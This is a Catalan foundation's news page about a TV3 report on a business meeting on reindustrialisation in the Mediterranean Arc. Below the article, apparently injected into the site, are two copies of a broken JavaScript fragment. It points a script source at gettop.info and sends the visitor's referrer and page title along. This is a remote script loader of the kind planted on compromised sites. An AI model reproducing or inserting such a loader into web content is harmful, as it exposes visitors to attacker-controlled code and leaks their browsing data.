Comunicació

La Fundació al Telenotícies Vespre de TV3

  • Empresaris valencians i catalans debaten sobre reindustrialització.                                  Aquesta trobada empresarial va tenir com objectiu analitzar el paper del sector industrial davant el segle XXI, el lloc de l’empresa davant aquest repte industrial i presentar l’agenda industrial europea per als pròxims anys, tot allò relacionat amb les sinèrgies que s’estableixen a l’Arc mediterrani. Antoni Garrell, Joan Vila i Emilio Golf van ser alguns dels ponents d’aquestes jornades.
  • Veure tot el video aquí 

}

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; }

Deixa un comentari

L'adreça electrònica no es publicarà Els camps necessaris estan marcats amb *

Podeu fer servir aquestes etiquetes i atributs HTML: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>